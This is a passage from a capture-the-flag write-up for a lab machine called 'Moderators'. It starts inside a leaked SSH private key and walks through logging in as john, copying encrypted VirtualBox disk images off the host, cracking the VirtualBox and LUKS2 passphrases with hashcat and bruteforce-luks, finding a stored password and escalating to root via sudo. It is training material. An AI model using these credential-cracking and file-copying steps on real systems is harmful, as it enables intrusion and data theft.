4V8F7PfPJ2oSs6c813vv6B1iKw1Ii9qAmPqBFC83rwnCjs+Q0AAADBANUfGWc7YgCVG5SO
u89ba4uO4wZ/zpbHog7cs1flldkrtDZluiqWWopTAKpnsD2CXSxoZ7cWdPytJeuElvlRmY
aUUrjaj2WFdNLgMjFb4jZeEcI3lz8BeRSTiXUSbLA4SxVLeSizZx8g1SNVAlE5VwUWZVYo
6ge465sU/c54jAxW2X2yioPCPdYVEpOTTZr40mg94/Zycxlbd8+L1jaepLqvXq5K4lSXPr
PoZ/w+K9mf5912RGlmSzBARVUyCqquLQAAAMEAwCGwEI9KR0zmcnfhGiQviWObgAUEDA7h
HxJn61h6sI0SsFOCatx9Q+a7sbKeVqQdph8Rn5rInzQ7TpvflHsrGzvU0ZpZ0Ys2928pN7
So+Bt6jTiNTXdD24/FmZbxn/BXLovEJpeT2L3V3kvabJAHhSykFP0+Q0dlNDmQxuMQ+muO
FQGVHxktaFKkrEl71gqoHPll8zNwNY9BjpxFPy48B1RgkxkfHSNZ8ujSI6Wse3tX6T03HD
fotkBDyCmCDxz3AAAAD2pvaG5AbW9kZXJhdG9ycwECAw==
-----END OPENSSH PRIVATE KEY-----

$ chmod 600 john_id_rsa
$ ssh -i john_id_rsa john@10.10.11.173

john@moderators:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),1002(moderators)

Post Enumeration As John

In john’s home diretory, there are some export message files generated from Whatsapp, and looks like john is storing some interesting messages:

john@moderators:~$ cat stuff/exp/2021-09-*

...
9/15/21, 23:55 - Messages and calls are end-to-end encrypted. No one outside of this chat, not even WhatsApp, can read or listen to them. Tap to learn more.
9/19/21, 00:39 - JOHN MILLER: Hey mate
9/19/21, 00:39 - JOHN MILLER: Are u free?
9/19/21, 00:41 - CARTOR BAIL: Yeah yeah
9/19/21, 00:41 - JOHN MILLER: I did what you said
9/19/21, 00:41 - JOHN MILLER: I copied all the VM files
9/19/21, 00:41 - CARTOR BAIL: Nice
9/19/21, 00:42 - CARTOR BAIL: Wait
9/19/21, 00:42 - CARTOR BAIL: What is the extension of tge file
9/19/21, 00:42 - JOHN MILLER: .vbox
9/19/21, 00:42 - JOHN MILLER: Why?
9/19/21, 00:42 - JOHN MILLER: That's the correct one ryt?
9/19/21, 00:42 - CARTOR BAIL: U idiot😂
9/19/21, 00:43 - CARTOR BAIL: Naah thats not the file you need.
9/19/21, 00:43 - CARTOR BAIL: Right one is something like .vdi or .vdmk
9/19/21, 00:43 - JOHN MILLER: Oh shoot😅
9/19/21, 00:43 - JOHN MILLER: My bad
9/19/21, 00:43 - CARTOR BAIL: U have vmware ryt?
9/19/21, 00:43 - JOHN MILLER: Nope virtual box
9/19/21, 00:43 - CARTOR BAIL: oh then most of the time it should be .vdi
9/19/21, 00:44 - JOHN MILLER: Ah kk
9/19/21, 00:44 - CARTOR BAIL: U know, I miss the old Sysadmin john. He was funny and stupid at the same time. ;)
9/19/21, 00:44 - JOHN MILLER: Hahaha real funny. But it's kinda true though.
9/19/21, 00:44 - CARTOR BAIL: Doing reboots at the deployement, Calling our clinet bro, using the same dubmb password... God I miss those days. 
9/19/21, 00:44 - JOHN MILLER: Okay Okay, I was stupid back then, not now. Btw I have a promotion comming up. 
...

John have copied some VM files, so I’ll take a look at them:

john@moderators:~$ ls -la stuff/VBOX/

total 118800
drwxr-xr-x 2 john john      4096 Jul 14 10:50 .
drwxr-xr-x 4 john john      4096 Jul 14 10:50 ..
-rwxr-xr-x 1 john john      5705 Sep 18  2020 2019-08-01.vbox
-rwxr-xr-x 1 john john 121634816 Sep 18  2020 2019.vdi

Using scp I’ll copy them to my machine:

$ scp -i john_id_rsa john@10.10.11.173:/home/john/stuff/VBOX/2019-08-01.vbox ./www/VBOX/
$ scp -i john_id_rsa john@10.10.11.173:/home/john/stuff/VBOX/2019.vdi ./www/VBOX/

Additional resources:
- Virtual Disk Image (.vdi) files are disk files specific to virtual box program (usually data is stored in these files) ( https://docs.fileformat.com/disc-and-media/vdi/). These files can be attached to any virual machine, and will be recognized as a new disk. For example, I can attach this image to my kali machine, and kali will recognize it as a new drive that can be mounted and accessed.
- .VBOX files are files where settings and configuration for virtual machines are stored ( https://fileinfo.com/extension/vbox).

Inspecting VM Files

By inspecting the .vbox file, I noticed that the 2019.vdi is encrypted, and that it is part of Ubuntu 22 Desktop virtual machine:

<MediaRegistry>
      <HardDisks>
        <HardDisk uuid="{12b147da-5b2d-471f-9e32-a32b1517ff4b}" location="F:/2019.vdi" format="VDI" type="Normal">
          <Property name="CRYPT/KeyId" value="Moderator 1"/>
          <Property name="CRYPT/KeyStore" value="U0NORQABQUVTLVhUUzI1Ni1QTEFJTjY0AAAAAAAAAAAAAAAAAABQQktERjItU0hB&#13;&#10;MjU2AAAAAAAAAAAAAAAAAAAAAAAAAEAAAABUQgV7yASjqRRgfezqVXSqcDjNzg1J&#13;&#10;jH/ENK/ozVskTyAAAADpYIvN2MBwhohZoxyfHl5d6YterYwh8lwMQ+5peBbjLCBO&#13;&#10;AABUYpGmB0lDsJbqgNsq451Bed5tHD8X6iXWLmJ6v6f7y2A9CABAAAAAo4alQy6T&#13;&#10;jyDI+8mvRgp4wXkMGavRxR6cC+ckk5yUgVhhgPxKNBNdhIHkNtjBMrj0uaVQ3ksk&#13;&#10;gwC6MrGLZFhl1g=="/>
        </HardDisk>
        <HardDisk uuid="{5999a8f0-e31d-4d4e-937d-173eb6ba8881}" location="Ubuntu.vdi" format="VDI" type="Normal"/>
      </HardDisks>
      <DVDImages>
        <Image uuid="{7653d755-c513-4004-8891-be83fc130dba}" location="F:/ubuntu-22.04-desktop-amd64.iso"/>
      </DVDImages>
    </MediaRegistry>

Inside <HardDisks></HardDisks> tags there are two .vdi images, 2019.vdi and Ubuntu.vdi
Inside <DVDImages></DVDImages> tags is stored the .iso image, in this case is ubuntu-22.04-desktop-amd64.iso

From these 2 .vdi images I only have 2019.vdi image, and because John’s silly mistake (as said in the previous messages, he copied the wrong file), I was able to get the .vbox file where the hash of this image is stored, which means that I can now try to crack it and see if I am able to find some interesting information inside it.

Cracking VDI File

Before cracking 2019.vdi’s encryption, I need to convert virtual box hash to a hash that hashcat understands, using virtualbox2hashcat.py:

$ python3 /opt/hashcat/tools/virtualbox2hashcat.py --vbox 2019-08-01.vbox 

$vbox$0$540000$546291a6074943b096ea80db2ae39d4179de6d1c3f17ea25d62e627abfa7fbcb$16$a386a5432e938f20c8fbc9af460a78c1790c19abd1c51e9c0be724939c9481586180fc4a34135d8481e436d8c132b8f4b9a550de4b248300ba32b18b645865d6$20000$e9608bcdd8c070868859a31c9f1e5e5de98b5ead8c21f25c0c43ee697816e32c$5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f

Then, I’ll use example.dict file from hashcat as wordlist to crack it:

This hash is VirtualBox PBKDF2-HMAC-SHA256 & AES-256-XTS, of mode 27600, but if you’re not sure you can let hashcat’s new feature “auto detect” decide what it is.

$ hashcat -a 0 -m 27600 $vbox$0$540000$546291a6074943b096ea80db2ae39d4179de6d1c3f17ea25d62e627abfa7fbcb$16$a386a5432e938f20c8fbc9af460a78c1790c19abd1c51e9c0be724939c9481586180fc4a34135d8481e436d8c132b8f4b9a550de4b248300ba32b18b645865d6$20000$e9608bcdd8c070868859a31c9f1e5e5de98b5ead8c21f25c0c43ee697816e32c$5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f example.dict

...
$vbox$0$540000$546291a6074943b096ea80db2ae39d4179de6d1c3f17ea25d62e627abfa7fbcb$16$a386a5432e938f20c8fbc9af460a78c1790c19abd1c51e9c0be724939c9481586180fc4a34135d8481e436d8c132b8f4b9a550de4b248300ba32b18b645865d6$20000$e9608bcdd8c070868859a31c9f1e5e5de98b5ead8c21f25c0c43ee697816e32c$5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f:computer
...

Decrypt VDI File And Attach It To Kali

The password is computer. I can now attach this file to my kali machine in virtual box.

To do that, first I need to modify the .vbox file, and remove any entry that maps to either Ubuntu.vdi or ubuntu-22.04-desktop-amd64.iso, since I don’t have any of them, and modify the location=“F:/2019.vdi” to the location where 2019.vdi is located (Use / instead of \ for the path, even if you’re on windows).

This is done to let VirtualBox decrypt the file before attaching it to kali.

The new file will be like this:

<?xml version="1.0"?>
<!--
** DO NOT EDIT THIS FILE.
** If you make changes to this file while any VirtualBox related application
** is running, your changes will be overwritten later, without taking effect.
** Use VBoxManage or the VirtualBox Manager GUI to make changes.
-->
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.16-windows">
  <Machine uuid="{528b3540-b8be-4677-b43f-7f4969137747}" name="Moderator 1" OSType="Ubuntu_64" snapshotFolder="Snapshots" lastStateChange="2021-09-15T16:44:57Z">
    <MediaRegistry>
      <HardDisks>
        <HardDisk uuid="{12b147da-5b2d-471f-9e32-a32b1517ff4b}" location="[Path To VDI]/2019.vdi" format="VDI" type="Normal">
          <Property name="CRYPT/KeyId" value="Moderator 1"/>
          <Property name="CRYPT/KeyStore" value="U0NORQABQUVTLVhUUzI1Ni1QTEFJTjY0AAAAAAAAAAAAAAAAAABQQktERjItU0hB&#13;&#10;MjU2AAAAAAAAAAAAAAAAAAAAAAAAAEAAAABUQgV7yASjqRRgfezqVXSqcDjNzg1J&#13;&#10;jH/ENK/ozVskTyAAAADpYIvN2MBwhohZoxyfHl5d6YterYwh8lwMQ+5peBbjLCBO&#13;&#10;AABUYpGmB0lDsJbqgNsq451Bed5tHD8X6iXWLmJ6v6f7y2A9CABAAAAAo4alQy6T&#13;&#10;jyDI+8mvRgp4wXkMGavRxR6cC+ckk5yUgVhhgPxKNBNdhIHkNtjBMrj0uaVQ3ksk&#13;&#10;gwC6MrGLZFhl1g=="/>
        </HardDisk>
      </HardDisks>
    </MediaRegistry>
    <ExtraData>
      <ExtraDataItem name="GUI/Fullscreen" value="true"/>
      <ExtraDataItem name="GUI/LastCloseAction" value="PowerOff"/>
      <ExtraDataItem name="GUI/LastGuestSizeHint" value="2560,1335"/>
      <ExtraDataItem name="GUI/LastNormalWindowPosition" value="0,23,2560,1377,max"/>
    </ExtraData>
    <Hardware>
      <CPU count="5">
        <PAE enabled="false"/>
        <LongMode enabled="true"/>
        <X2APIC enabled="true"/>
        <HardwareVirtExLargePages enabled="true"/>
      </CPU>
      <Memory RAMSize="6025"/>
      <HID Pointing="USBTablet"/>
      <Boot>
        <Order position="1" device="Floppy"/>
        <Order position="2" device="HardDisk"/>
        <Order position="3" device="DVD"/>
        <Order position="4" device="None"/>
      </Boot>
      <Display controller="VMSVGA" VRAMSize="128" accelerate3D="true"/>
      <VideoCapture screens="1" file="." fps="25"/>
      <BIOS>
        <IOAPIC enabled="true"/>
        <SmbiosUuidLittleEndian enabled="true"/>
      </BIOS>
      <USB>
        <Controllers>
          <Controller name="OHCI" type="OHCI"/>
          <Controller name="EHCI" type="EHCI"/>
        </Controllers>
      </USB>
      <Network>
        <Adapter slot="0" enabled="true" MACAddress="08002799F7EC" type="82540EM">
          <NAT/>
        </Adapter>
      </Network>
      <AudioAdapter codec="AD1980" driver="DirectSound" enabled="true" enabledIn="false"/>
      <RTC localOrUTC="UTC"/>
      <Clipboard/>
      <GuestProperties>
        <GuestProperty name="/VirtualBox/GuestAdd/HostVerLastChecked" value="6.1.34" timestamp="1657117437893678100" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/Revision" value="150636" timestamp="1657117380950198406" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/Version" value="6.1.34" timestamp="1657117380950198404" flags=""/>
        <GuestProperty name="/VirtualBox/GuestAdd/VersionExt" value="6.1.34" timestamp="1657117380950198405" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/MAC" value="08002799F7EC" timestamp="1657117380952151105" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/Name" value="enp0s3" timestamp="1657117380952151107" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/Status" value="Up" timestamp="1657117380952151106" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/Broadcast" value="10.0.2.255" timestamp="1657117380952151103" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/IP" value="10.0.2.15" timestamp="1657117380952151102" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/0/V4/Netmask" value="255.255.255.0" timestamp="1657117380952151104" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/Net/Count" value="1" timestamp="1657117646084736900" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Product" value="Linux" timestamp="1657117380950198400" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Release" value="5.15.0-40-generic" timestamp="1657117380950198401" flags=""/>
        <GuestProperty name="/VirtualBox/GuestInfo/OS/Version" value="#43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022" timestamp="1657117380950198402" flags=""/>
        <GuestProperty name="/VirtualBox/HostInfo/DekMissing" value="1" timestamp="1657283915359907501" flags="RDONLYGUEST"/>
        <GuestProperty name="/VirtualBox/HostInfo/GUI/LanguageID" value="en_US" timestamp="1657284945611553900" flags=""/>
      </GuestProperties>
    </Hardware>
    <StorageControllers>
      <StorageController name="AHCI" type="AHCI" PortCount="3" useHostIOCache="false" Bootable="true" IDE0MasterEmulationPort="0" IDE0SlaveEmulationPort="1" IDE1MasterEmulationPort="2" IDE1SlaveEmulationPort="3">
        <AttachedDevice type="HardDisk" hotpluggable="false" port="1" device="0">
          <Image uuid="{12b147da-5b2d-471f-9e32-a32b1517ff4b}"/>
        </AttachedDevice>
      </StorageController>
    </StorageControllers>
  </Machine>
</VirtualBox>

You might need to install the extension pack from https://www.virtualbox.org/wiki/Download_Old_Builds_6_1 or any other source, to be able to decrypt the .vdi file.

Then I can simply double click the file or choose open with VirtualBox:

Opening VDI File

Now, I need to head to Moderator 1 -> Settings -> General -> Disk Encryption and uncheck enable disk encryption and then click OK.

Disabling Encryption

It will prompt me to enter the password, so I’ll enter computer and hit OK:

Entering Password

After that, the .vdi image should be decrypted and I can attach it to kali.

So, I need to head to Tools and press on Add button and select 2019.vdi (by navigating to its location).

Adding VDI

Selecting VDI To Add

After that, I will attach this file to my kali. I need to head to Kali VM-> Settings -> Storage then press on Add hard disk under the Controller: SATA entry and choose 2019.vdi that I just added.

Virtual Box Kali’s Settings

Attaching VDI File

Once I click OK and boot my machine, I can see that the file has been mounted:

Discovering The File Is Encrypted

Cracking LUKS2 Encryption

However, the file appears to be encrypted again, so I need to know what type of encryption to see if I can crack it, I’ll use blkid command:

$ sudo blkid

/dev/sdb: UUID="b41603a3-442c-45a1-a71a-a93ff87e4a43" TYPE="crypto_LUKS"
/dev/sda5: UUID="6cfec41f-5585-48d3-a541-a78af63ba15a" TYPE="swap" PARTUUID="5bb6cb92-05"
/dev/sda1: UUID="bc3a4179-0361-4041-a09e-f543948513e9" BLOCK_SIZE="4096" TYPE="ext4" PTTYPE="dos" PARTUUID="5bb6cb92-01"

The .vdi file is /dev/sdb which appears to be encrypted using LUKS.

To get more information about which type of LUKS encryption is used, I’ll use cryptsetup command:

$ sudo cryptsetup luksDump /dev/sdb

LUKS header information
Version:       	2
Epoch:         	7
Metadata area: 	16384 [bytes]
Keyslots area: 	16744448 [bytes]
UUID:          	b41603a3-442c-45a1-a71a-a93ff87e4a43
Label:         	(no label)
Subsystem:     	(no subsystem)
Flags:       	(no flags)

Data segments:
  0: crypt
	offset: 16777216 [bytes]
	length: (whole device)
	cipher: aes-xts-plain64
	sector: 512 [bytes]

Keyslots:
  0: luks2
	Key:        512 bits
	Priority:   normal
	Cipher:     aes-xts-plain64
	Cipher key: 512 bits
	PBKDF:      argon2id
	Time cost:  8
	Memory:     1048576
	Threads:    4
	Salt:       c9 06 76 de 9f 07 13 28 04 cc d1 fe 41 47 dd 63 
	           fd 6d 0c 7e ac 8b 1d d8 4b 48 1d 59 3a 7f 6b 48 
	AF stripes: 4000
	AF hash:    sha256
	Area offset:32768 [bytes]
	Area length:258048 [bytes]
	Digest ID:  0
Tokens:
Digests:
  0: pbkdf2
	Hash:       sha256
	Iterations: 108683
	Salt:       cd 63 c4 d5 70 42 ab a3 a5 a9 98 ea 71 b0 fa cb 
	           91 4c 1a e2 a0 8b 0a cc 25 7a 8a c1 54 b1 88 39 
	Digest:     79 2e 78 f6 a1 2c 04 46 2f 3a db 4b 68 8a 18 8d 
	           22 7f d4 df 26 f2 19 e2 f1 5b aa cc 13 f1 be 55

It appears to be LUKS version 2 encryption, and unfortunately at the time of doing this writeup, neither hashcat nor john support cracking this type, which means that I need to use a new tool, in my case bruteforce-luks.

Installation: sudo apt install bruteforce-luks

$ sudo bruteforce-luks -t 1 -f /usr/share/wordlists/rockyou.txt /dev/sdb

Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 9
Tried passwords per second: 0.473684
Last tried password: abc123

Password found: abc123

And the password is abc123.

I’ll use cryptsetup to decrypt the image and then mount it, to be able to see its content:

$ sudo cryptsetup luksOpen /dev/sdb decrypted_vdi
Enter passphrase for /dev/sdb: 

$ sudo mount /dev/mapper/decrypted_vdi /mnt/
$ cd /mnt/
$ ls -la

total 64
drwxr-xr-x  4 root root  4096 Jul  6 19:16 .
drwxr-xr-x 19 root root 36864 Oct 14 16:16 ..
drwx------  2 root root 16384 Jul  6 19:13 lost+found
drwxr-xr-x  6 root root  4096 Jul  6 19:16 scripts

Finding John’s Password And Escalating To Root

The first thing I’ll do, is to search for passwords, using a simple grep -Ri pass, I got the following:

$ grep -Ri pass

...
scripts/all-in-one/distro_update.sh:passwd='$_THE_best_Sysadmin_Ever_'
...

I can notice that scripts/all-in-one/distro_update.sh contains a variable passwd that has the value $THE_best_Sysadmin_Ever. Since John is an admin according to the messages read before, I will try to run sudo -l command and provide this as password:

john@moderators:~$ sudo -l
[sudo] password for john: 
Matching Defaults entries for john on moderators:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on moderators:
    (root) ALL

John user can run All commands as root, so I’ll escalate to root using that:

john@moderators:~$ sudo su

root@moderators:/home/john# id
uid=0(root) gid=0(root) groups=0(root)

root@moderators:/home/john# cat /root/root.txt 
1f2**************************636